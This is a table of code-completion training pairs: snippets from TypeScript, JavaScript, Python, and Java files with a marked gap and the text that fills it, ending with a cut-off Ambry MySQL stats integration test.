| prompt (large_string, lengths 70–991k) | completion (large_string, lengths 0–1.02k) |
|---|---|
<|file_name|>java.beans.EventHandler.d.ts<|end_file_name|><|fim▁begin|>declare namespace java {
namespace beans {
class EventHandler implements java.lang.reflect.InvocationHandler {
public constructor(arg0: java.lang.Object | any, arg1: java.lang.String | string, arg2: java.lang.String | string, arg3: java.lang.String | string)
public getTarget(): java.lang.Object
public getAction(): java.lang.String
public getEventPropertyName(): java.lang.String<|fim▁hole|> public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string, arg3: java.lang.String | string): T
public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string, arg3: java.lang.String | string, arg4: java.lang.String | string): T
}
}
}<|fim▁end|> | public getListenerMethodName(): java.lang.String
public invoke(arg0: java.lang.Object | any, arg1: java.lang.reflect.Method, arg2: java.lang.Object[] | any[]): java.lang.Object
public static create<T>(arg0: java.lang.Class<T>, arg1: java.lang.Object | any, arg2: java.lang.String | string): T |
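The declaration above only describes the shape of `java.beans.EventHandler`; the sketch below shows how the three-argument `create` overload could be invoked through such typings. It is illustrative only: the runtime that binds the `java.*` namespace, and the `windowListenerClass` and `frame` values, are assumptions, not part of the declaration file.

```typescript
// Hypothetical usage of the declarations above; assumes some Java-to-TypeScript
// bridge supplies these values at runtime.
declare const windowListenerClass: java.lang.Class<java.lang.Object>;
declare const frame: java.lang.Object;

// Three-argument create(): the returned proxy forwards listener-interface
// calls to frame.toFront().
const handler = java.beans.EventHandler.create(windowListenerClass, frame, "toFront");
```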
<|file_name|>multiResolution.js<|end_file_name|><|fim▁begin|>export function getCorrectFontSizeForScreen(PixelRatio, screenWidth, screenHeight, currentFont){
let devRatio = PixelRatio.get();
let factor = (((screenWidth*devRatio)/320)+((screenHeight*devRatio)/640))/2.0;
let maxFontDifferFactor = 5; //the maximum pixels of font size we can go up or down<|fim▁hole|> return currentFont-float2int(maxFontDifferFactor*0.3);
}else if((factor>=1) && (factor<=1.6)){
return currentFont-float2int(maxFontDifferFactor*0.1);
}else if((factor>=1.6) && (factor<=2)){
return currentFont;
}else if((factor>=2) && (factor<=3)){
return currentFont+float2int(maxFontDifferFactor*0.65);
}else if (factor>=3){
return currentFont+float2int(maxFontDifferFactor);
}
}
function float2int (value) {
return value | 0;
}<|fim▁end|> | if(factor<=1){ |
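A minimal sketch of calling the helper above from a React Native app; `PixelRatio` and `Dimensions` are the standard `react-native` exports, and the base size of 14 is an arbitrary example value.

```typescript
import { PixelRatio, Dimensions } from 'react-native';
import { getCorrectFontSizeForScreen } from './multiResolution';

const { width, height } = Dimensions.get('window');
// Scale a base font size of 14 for the current screen size and pixel density.
const fontSize = getCorrectFontSizeForScreen(PixelRatio, width, height, 14);
```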
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
"""CnbetaApi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')<|fim▁hole|>Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^apis/', include('CnbetaApis.urls')),
]<|fim▁end|> | |
<|file_name|>BuildableTexture.java<|end_file_name|><|fim▁begin|>package org.anddev.andengine.opengl.texture;
import java.util.*;
import org.anddev.andengine.opengl.texture.source.*;
import org.anddev.andengine.util.*;
import org.anddev.andengine.opengl.texture.builder.*;
import android.graphics.*;
public class BuildableTexture extends Texture
{
private final ArrayList<TextureSourceWithWithLocationCallback> mTextureSourcesToPlace;
public BuildableTexture(final int n, final int n2) {
super(n, n2, TextureOptions.DEFAULT, null);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final ITextureStateListener textureStateListener) {
super(n, n2, TextureOptions.DEFAULT, textureStateListener);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final TextureOptions textureOptions) throws IllegalArgumentException {
super(n, n2, textureOptions, null);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
public BuildableTexture(final int n, final int n2, final TextureOptions textureOptions, final ITextureStateListener textureStateListener) throws IllegalArgumentException {
super(n, n2, textureOptions, textureStateListener);
this.mTextureSourcesToPlace = new ArrayList<TextureSourceWithWithLocationCallback>();
}
@Deprecated
@Override
public TextureSourceWithLocation addTextureSource(final ITextureSource textureSource, final int n, final int n2) {
return super.addTextureSource(textureSource, n, n2);
}
public void addTextureSource(final ITextureSource textureSource, final Callback<TextureSourceWithLocation> callback) {
this.mTextureSourcesToPlace.add(new TextureSourceWithWithLocationCallback(textureSource, callback));
}
public void build(final ITextureBuilder textureBuilder) throws ITextureBuilder.TextureSourcePackingException {
textureBuilder.pack(this, this.mTextureSourcesToPlace);
this.mTextureSourcesToPlace.clear();
this.mUpdateOnHardwareNeeded = true;
}
@Override
public void clearTextureSources() {
super.clearTextureSources();
this.mTextureSourcesToPlace.clear();
}
public void removeTextureSource(final ITextureSource textureSource) {
final ArrayList<TextureSourceWithWithLocationCallback> mTextureSourcesToPlace = this.mTextureSourcesToPlace;
for (int i = -1 + mTextureSourcesToPlace.size(); i >= 0; --i) {
if (mTextureSourcesToPlace.get(i).mTextureSource == textureSource) {
mTextureSourcesToPlace.remove(i);
this.mUpdateOnHardwareNeeded = true;
return;
}
}
}
public static class TextureSourceWithWithLocationCallback implements ITextureSource
{
private final Callback<TextureSourceWithLocation> mCallback;
private final ITextureSource mTextureSource;
public TextureSourceWithWithLocationCallback(final ITextureSource mTextureSource, final Callback<TextureSourceWithLocation> mCallback) {
super();
this.mTextureSource = mTextureSource;
this.mCallback = mCallback;
}
@Override<|fim▁hole|>
public Callback<TextureSourceWithLocation> getCallback() {
return this.mCallback;
}
@Override
public int getHeight() {
return this.mTextureSource.getHeight();
}
public ITextureSource getTextureSource() {
return this.mTextureSource;
}
@Override
public int getWidth() {
return this.mTextureSource.getWidth();
}
@Override
public Bitmap onLoadBitmap() {
return this.mTextureSource.onLoadBitmap();
}
@Override
public String toString() {
return this.mTextureSource.toString();
}
}
}<|fim▁end|> | public TextureSourceWithWithLocationCallback clone() {
return null;
} |
<|file_name|>VM.java<|end_file_name|><|fim▁begin|>package com.hadroncfy.jphp.jzend;
import com.hadroncfy.jphp.jzend.types.typeInterfaces.Zval;
/**
* Created by cfy on 16-9-1.
*/
public interface VM {
void push(Zval val);
Zval pop();
Zval peek();
void echo(String s);<|fim▁hole|> void jump(int line);
void doBreak(int index);
void doContinue(int index);
Context getEnv();
void beginSilence();
void endSilence();
Zval load(int index);
void store(Zval val,int index);
}<|fim▁end|> | void exit(Zval ret);
void retour(Zval zval);
void doThrow(Zval zval);
void makeError(String msg); |
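To make the stack contract concrete, here is a minimal TypeScript sketch of the push/pop/peek behaviour the interface implies; `Zval` is stubbed as an opaque type and the PHP-specific operations (echo, jumps, silence handling) are omitted.

```typescript
type Zval = unknown; // stand-in for the engine's value type

class StackVM {
  private stack: Zval[] = [];

  push(val: Zval): void { this.stack.push(val); }

  pop(): Zval {
    const v = this.stack.pop();
    if (v === undefined) throw new Error('stack underflow');
    return v;
  }

  // Return the top of the stack without removing it.
  peek(): Zval { return this.stack[this.stack.length - 1]; }
}
```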
<|file_name|>config.py<|end_file_name|><|fim▁begin|># SPDX-License-Identifier: GPL-2.0
#
# Copyright 2019 Google LLC.
import gdb
import zlib
from linux import utils
class LxConfigDump(gdb.Command):
"""Output kernel config to the filename specified as the command
argument. Equivalent to 'zcat /proc/config.gz > config.txt' on
a running target"""
def __init__(self):
super(LxConfigDump, self).__init__("lx-configdump", gdb.COMMAND_DATA,
gdb.COMPLETE_FILENAME)
def invoke(self, arg, from_tty):<|fim▁hole|>
try:
py_config_ptr = gdb.parse_and_eval("kernel_config_data + 8")
py_config_size = gdb.parse_and_eval(
"sizeof(kernel_config_data) - 1 - 8 * 2")
except gdb.error as e:
raise gdb.GdbError("Can't find config, enable CONFIG_IKCONFIG?")
inf = gdb.inferiors()[0]
zconfig_buf = utils.read_memoryview(inf, py_config_ptr,
py_config_size).tobytes()
config_buf = zlib.decompress(zconfig_buf, 16)
with open(filename, 'wb') as f:
f.write(config_buf)
gdb.write("Dumped config to " + filename + "\n")
LxConfigDump()<|fim▁end|> | if len(arg) == 0:
filename = "config.txt"
else:
filename = arg |
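For context, the command registered above runs inside a gdb session attached to a kernel built with CONFIG_IKCONFIG; an illustrative session (not taken from the source) would look like:

```
(gdb) lx-configdump
Dumped config to config.txt
(gdb) lx-configdump my_config.txt
Dumped config to my_config.txt
```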
<|file_name|>GumballMachineTestDrive.java<|end_file_name|><|fim▁begin|>package ProxyPattern;
public class GumballMachineTestDrive {
public static void main(String[] args) {
int count = 0;
if (args.length < 2) {
System.out.println("GumballMachine <name> <inventory>");
System.exit(1);
}<|fim▁hole|> count = Integer.parseInt(args[1]);
GumballMachine gumballMachine = new GumballMachine(args[0], count);
GumballMonitor monitor = new GumballMonitor(gumballMachine);
monitor.report();
}
}<|fim▁end|> | |
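For reference, the test drive above expects a machine name and an inventory count as command-line arguments, so a typical (illustrative) invocation is:

```
$ java ProxyPattern.GumballMachineTestDrive Seattle 112
```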
<|file_name|>AccountStatsMySqlStoreIntegrationTest.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2020 LinkedIn Corp. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
package com.github.ambry.accountstats;
import com.codahale.metrics.MetricRegistry;
import com.github.ambry.config.AccountStatsMySqlConfig;
import com.github.ambry.config.ClusterMapConfig;
import com.github.ambry.config.VerifiableProperties;
import com.github.ambry.server.HostAccountStorageStatsWrapper;
import com.github.ambry.server.HostPartitionClassStorageStatsWrapper;
import com.github.ambry.server.StatsHeader;
import com.github.ambry.server.StatsReportType;
import com.github.ambry.server.StatsSnapshot;
import com.github.ambry.server.StatsWrapper;
import com.github.ambry.server.StorageStatsUtil;
import com.github.ambry.server.StorageStatsUtilTest;
import com.github.ambry.server.storagestats.AggregatedAccountStorageStats;
import com.github.ambry.server.storagestats.AggregatedPartitionClassStorageStats;
import com.github.ambry.server.storagestats.ContainerStorageStats;
import com.github.ambry.server.storagestats.HostAccountStorageStats;
import com.github.ambry.server.storagestats.HostPartitionClassStorageStats;
import com.github.ambry.utils.Pair;
import com.github.ambry.utils.TestUtils;
import com.github.ambry.utils.Utils;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Properties;
import java.util.Random;
import java.util.Set;
import java.util.stream.Collectors;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import static org.junit.Assert.*;
/**
* Integration tests for {@link AccountStatsMySqlStore}.
*/
@RunWith(Parameterized.class)
public class AccountStatsMySqlStoreIntegrationTest {
private static final String clusterName1 = "Ambry-test";
private static final String clusterName2 = "Ambry-random";
// hostname1 and hostname2 are the same, but with different port numbers
private static final String hostname1 = "ambry1.test.github.com";
private static final String hostname2 = "ambry1.test.github.com";
private static final String hostname3 = "ambry3.test.github.com";
private static final int port1 = 12345;
private static final int port2 = 12346;
private static final int port3 = 12347;
private final int batchSize;
private final AccountStatsMySqlStore mySqlStore;
@Parameterized.Parameters
public static List<Object[]> data() {
return Arrays.asList(new Object[][]{{0}, {17}});
}
public AccountStatsMySqlStoreIntegrationTest(int batchSize) throws Exception {
this.batchSize = batchSize;
mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
}
@Before
public void before() throws Exception {
mySqlStore.cleanupTables();
}
@After
public void after() {
mySqlStore.shutdown();
}
/**
* Tests to store multiple stats for multiple hosts and recover stats from the database.
* @throws Exception
*/
@Test
public void testMultiStoreStats() throws Exception {
AccountStatsMySqlStore mySqlStore1 = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
AccountStatsMySqlStore mySqlStore2 = createAccountStatsMySqlStore(clusterName1, hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Generate StatsWrappers, store them and retrieve them
StatsWrapper stats1 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
StatsWrapper stats2 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
StatsWrapper stats3 = generateStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore1.storeAccountStats(stats1);
mySqlStore2.storeAccountStats(stats2);
mySqlStore3.storeAccountStats(stats3);
assertTableSize(mySqlStore1, 3 * 10 * 10);
StatsWrapper obtainedStats1 = mySqlStore1.queryAccountStatsByHost(hostname1, port1);
StatsWrapper obtainedStats2 = mySqlStore2.queryAccountStatsByHost(hostname2, port2);
StatsWrapper obtainedStats3 = mySqlStore3.queryAccountStatsByHost(hostname3, port3);
assertTwoStatsSnapshots(obtainedStats1.getSnapshot(), stats1.getSnapshot());
assertTwoStatsSnapshots(obtainedStats2.getSnapshot(), stats2.getSnapshot());
assertTwoStatsSnapshots(obtainedStats3.getSnapshot(), stats3.getSnapshot());
// Generate HostAccountStorageStatsWrappers, store them and retrieve them
HostAccountStorageStatsWrapper hostStats1 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
HostAccountStorageStatsWrapper hostStats2 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
HostAccountStorageStatsWrapper hostStats3 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore1.storeHostAccountStorageStats(hostStats1);
mySqlStore2.storeHostAccountStorageStats(hostStats2);
mySqlStore3.storeHostAccountStorageStats(hostStats3);
HostAccountStorageStatsWrapper obtainedHostStats1 =
mySqlStore1.queryHostAccountStorageStatsByHost(hostname1, port1);
HostAccountStorageStatsWrapper obtainedHostStats2 =
mySqlStore2.queryHostAccountStorageStatsByHost(hostname2, port2);
HostAccountStorageStatsWrapper obtainedHostStats3 =
mySqlStore3.queryHostAccountStorageStatsByHost(hostname3, port3);
assertEquals(hostStats1.getStats().getStorageStats(), obtainedHostStats1.getStats().getStorageStats());
assertEquals(hostStats2.getStats().getStorageStats(), obtainedHostStats2.getStats().getStorageStats());
assertEquals(hostStats3.getStats().getStorageStats(), obtainedHostStats3.getStats().getStorageStats());
// Retrieve StatWrappers
obtainedStats1 = mySqlStore1.queryAccountStatsByHost(hostname1, port1);
StatsSnapshot converted =
StorageStatsUtil.convertHostAccountStorageStatsToStatsSnapshot(hostStats1.getStats(), false);
assertTwoStatsSnapshots(converted, obtainedStats1.getSnapshot());
mySqlStore1.shutdown();
mySqlStore2.shutdown();
mySqlStore3.shutdown();
}
@Test
public void testEmptyStatsWhenReadingPreviousStatsFromMysqlDb() throws Exception {
//write new stats into the database.
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(1, 1, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats.getStats().getStorageStats().containsKey((long) 0));
//reinitialize the mySqlStore and write new stats for the same partition.
mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
assertTrue(
mySqlStore.getPreviousHostAccountStorageStatsWrapper().getStats().getStorageStats().containsKey((long) 0));
HostAccountStorageStatsWrapper stats2 =
generateHostAccountStorageStatsWrapper(0, 0, 0, StatsReportType.ACCOUNT_REPORT);
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(stats2.getStats().getStorageStats());
newStorageStats.put((long) 0,
new HashMap<>()); // Remove partition 0's storage stats; this removes the entire partition from the database
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats2.getHeader(), new HostAccountStorageStats(newStorageStats)));
// empty stats should remove all the data in the database
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats.getStats().getStorageStats().containsKey((long) 0));
}
@Test
public void testEmptyStatsWhenReadingPreviousStatsFromLocalBackUpFile() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, new HashMap<>());
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats.getStats().getStorageStats().containsKey((long) 10));
// Write new stats with partition 10 still empty
HostAccountStorageStatsWrapper stats2 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
newStorageStats = new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, new HashMap<>());
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats2.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertFalse(obtainedStats2.getStats().getStorageStats().containsKey((long) 10));
// Write new stats with partition 10 not empty
HostAccountStorageStatsWrapper stats3 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
newStorageStats = new HashMap<>(stats.getStats().getStorageStats());
newStorageStats.put((long) 10, stats.getStats().getStorageStats().get((long) 1));
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats(newStorageStats)));
HostAccountStorageStatsWrapper obtainedStats3 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats3.getStats().getStorageStats().containsKey((long) 10));
// Write an empty HostAccountStorageStats
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats()));
// Empty storage stats should remove all the data in the database
HostAccountStorageStatsWrapper obtainedStats4 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats4.getStats().getStorageStats().isEmpty());
// Write an empty HostAccountStorageStats again
mySqlStore.storeHostAccountStorageStats(
new HostAccountStorageStatsWrapper(stats3.getHeader(), new HostAccountStorageStats()));
HostAccountStorageStatsWrapper obtainedStats5 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertTrue(obtainedStats5.getStats().getStorageStats().isEmpty());
HostAccountStorageStatsWrapper stats6 =
generateHostAccountStorageStatsWrapper(20, 20, 20, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats6);
HostAccountStorageStatsWrapper obtainedStats6 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats6.getStats().getStorageStats(), stats6.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Test to delete partition, account and container data from the database
* @throws Exception
*/
@Test
public void testStatsDeletePartitionAccountContainer() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats =
generateHostAccountStorageStatsWrapper(10, 10, 10, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
// Now remove one partition from stats
HostAccountStorageStats storageStatsCopy = new HostAccountStorageStats(stats.getStats());
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStatsMap =
new HashMap<>(storageStatsCopy.getStorageStats());
newStorageStatsMap.remove((long) 1);
HostAccountStorageStatsWrapper stats2 = new HostAccountStorageStatsWrapper(new StatsHeader(stats.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats2);
HostAccountStorageStatsWrapper obtainedStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats2.getStats().getStorageStats(), stats2.getStats().getStorageStats());
// Now remove one account from stats
storageStatsCopy = new HostAccountStorageStats(stats2.getStats());
newStorageStatsMap = new HashMap<>(storageStatsCopy.getStorageStats());
newStorageStatsMap.get((long) 3).remove((short) 1);
HostAccountStorageStatsWrapper stats3 = new HostAccountStorageStatsWrapper(new StatsHeader(stats2.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats3);
HostAccountStorageStatsWrapper obtainedStats3 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats3.getStats().getStorageStats(), stats3.getStats().getStorageStats());
// Now remove some containers
storageStatsCopy = new HostAccountStorageStats(stats3.getStats());
newStorageStatsMap = new HashMap<>(storageStatsCopy.getStorageStats());
for (short containerId : new short[]{0, 1, 2}) {
newStorageStatsMap.get((long) 3).get((short) 3).remove(containerId);
}
HostAccountStorageStatsWrapper stats4 = new HostAccountStorageStatsWrapper(new StatsHeader(stats3.getHeader()),
new HostAccountStorageStats(newStorageStatsMap));
mySqlStore.storeHostAccountStorageStats(stats4);
HostAccountStorageStatsWrapper obtainedStats4 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(obtainedStats4.getStats().getStorageStats(), stats4.getStats().getStorageStats());
// Now write the stats back
stats = generateHostAccountStorageStatsWrapper(10, 10, 10, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Tests to store multiple stats for one host and recover stats from the database.
* @throws Exception
*/
@Test
public void testStoreMultipleWrites() throws Exception {
AccountStatsMySqlStore mySqlStore = createAccountStatsMySqlStore(clusterName1, hostname1, port1);
HostAccountStorageStatsWrapper stats1 =
generateHostAccountStorageStatsWrapper(10, 10, 1, StatsReportType.ACCOUNT_REPORT);
mySqlStore.storeHostAccountStorageStats(stats1);
HostAccountStorageStats hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStats =
new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
ContainerStorageStats origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0,
new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
HostAccountStorageStatsWrapper stats2 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats2);
HostAccountStorageStatsWrapper obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats2.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
newStorageStats = new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0,
new ContainerStorageStats.Builder(origin).physicalStorageUsage(origin.getPhysicalStorageUsage() + 1)
.build());
HostAccountStorageStatsWrapper stats3 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats3);
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats3.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
hostAccountStorageStatsCopy = new HostAccountStorageStats(stats1.getStats());
newStorageStats = new HashMap<>(hostAccountStorageStatsCopy.getStorageStats());
origin = newStorageStats.get((long) 0).get((short) 0).get((short) 0);
newStorageStats.get((long) 0)
.get((short) 0)
.put((short) 0, new ContainerStorageStats.Builder(origin).numberOfBlobs(origin.getNumberOfBlobs() + 1).build());
HostAccountStorageStatsWrapper stats4 = new HostAccountStorageStatsWrapper(new StatsHeader(stats1.getHeader()),
new HostAccountStorageStats(newStorageStats));
mySqlStore.storeHostAccountStorageStats(stats4);
obtainedStats = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
assertEquals(stats4.getStats().getStorageStats(), obtainedStats.getStats().getStorageStats());
mySqlStore.shutdown();
}
/**
* Test the methods for storing, deleting and fetching aggregated account stats.
* @throws Exception
*/
@Test
public void testAggregatedAccountStats() throws Exception {
Map<String, Map<String, Long>> containerStorageUsages = TestUtils.makeStorageMap(10, 10, 100000, 1000);
StatsSnapshot snapshot = TestUtils.makeAccountStatsSnapshotFromContainerStorageMap(containerStorageUsages);
mySqlStore.storeAggregatedAccountStats(snapshot);
Map<String, Map<String, Long>> obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(containerStorageUsages, obtainedContainerStorageUsages);
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(snapshot, obtainedSnapshot);
// Fetching aggregated account stats for clustername2 should result in empty stats
assertEquals(mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName2).getSubMap().size(), 0);
// Change one value and store it to mysql database again
StatsSnapshot newSnapshot = new StatsSnapshot(snapshot);
newSnapshot.getSubMap()
.get(Utils.statsAccountKey((short) 1))
.getSubMap()
.get(Utils.statsContainerKey((short) 1))
.setValue(1);
newSnapshot.updateValue();
containerStorageUsages.get("1").put("1", 1L);
mySqlStore.storeAggregatedAccountStats(newSnapshot);
obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(containerStorageUsages, obtainedContainerStorageUsages);
// Delete account and container
newSnapshot = new StatsSnapshot(newSnapshot);
newSnapshot.getSubMap().remove(Utils.statsAccountKey((short) 1));
newSnapshot.getSubMap()
.get(Utils.statsAccountKey((short) 2))
.getSubMap()
.remove(Utils.statsContainerKey((short) 1));
newSnapshot.updateValue();
// Now remove all containers for account 1 and container 1 of account 2
for (String containerId : containerStorageUsages.get(String.valueOf(1)).keySet()) {
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 1, Short.valueOf(containerId));
}
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 2, (short) 1);
obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(newSnapshot, obtainedSnapshot);
mySqlStore.shutdown();
}
/**
* Test the methods for storing, deleting and fetching aggregated account storage stats.
* @throws Exception
*/
@Test
public void testAggregatedAccountStorageStats() throws Exception {
AggregatedAccountStorageStats aggregatedAccountStorageStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
// Compare container usage map
Map<String, Map<String, Long>> obtainedContainerStorageUsages = mySqlStore.queryAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(aggregatedAccountStorageStats, false),
obtainedContainerStorageUsages);
// Compare StatsSnapshot
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName1);
assertEquals(
StorageStatsUtil.convertAggregatedAccountStorageStatsToStatsSnapshot(aggregatedAccountStorageStats, false),
obtainedSnapshot);
// Compare AggregatedAccountStorageStats
AggregatedAccountStorageStats obtainedStats = mySqlStore.queryAggregatedAccountStorageStats();
assertEquals(aggregatedAccountStorageStats.getStorageStats(), obtainedStats.getStorageStats());
obtainedStats = mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName1);
assertEquals(aggregatedAccountStorageStats.getStorageStats(), obtainedStats.getStorageStats());
// Fetching aggregated account stats for clustername2 should result in empty stats
assertEquals(mySqlStore.queryAggregatedAccountStatsByClusterName(clusterName2).getSubMap().size(), 0);
assertEquals(mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName2).getStorageStats().size(), 0);
// Change one value and store it to mysql database again
Map<Short, Map<Short, ContainerStorageStats>> newStorageStatsMap =
new HashMap<>(aggregatedAccountStorageStats.getStorageStats());
ContainerStorageStats origin = newStorageStatsMap.get((short) 1).get((short) 1);
newStorageStatsMap.get((short) 1)
.put((short) 1,
